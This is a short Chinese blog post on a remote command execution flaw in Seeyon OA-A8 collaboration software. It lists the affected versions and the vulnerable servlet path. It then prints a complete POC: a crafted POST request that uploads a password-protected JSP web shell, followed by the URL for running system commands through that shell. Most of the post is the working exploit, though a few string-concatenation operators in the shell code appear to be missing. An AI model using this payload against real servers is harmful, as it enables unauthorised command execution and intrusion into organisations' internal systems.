致远OA-A8系统远程命令执行⭐

原创 sauren  2019-08-20 17:43  阅读 407 views 次 评论 0 条

最近IDS检测到一些奇怪的远程命令执行POC:

GET //seeyon/test123456.jsp?pwd=asasd3344&cmd=godkey HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn

检索到是一款利用致远OA-A8系统远程命令执行漏洞的自动化工具

 

漏洞影响的产品版本包括:

致远A8-V5协同管理软件 V6.1sp1

致远A8+协同管理软件V7.0、V7.0sp1、V7.0sp2、V7.0sp3

致远A8+协同管理软件V7.1

漏洞位置
/seeyon/htmlofficeservlet
POC:
POST /seeyon/htmlofficeservlet HTTP/1.1 
Content-Length: 1121 
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 
Host: xxxxxxxxx 
Pragma: no-cache

DBSTEP V3.0     355             0               666             DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATddYQ5yiKXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp "\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();} %><%if("qing".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>" excuteCmd(request.getParameter("cmd"))   "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce

 

执行成功后访问 /seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+net user即可。

本文地址:/archives/299.html
版权声明:本文为原创文章,版权归 sauren 所有,欢迎分享本文,转载请保留出处!
高性能云服务器特惠

发表评论


表情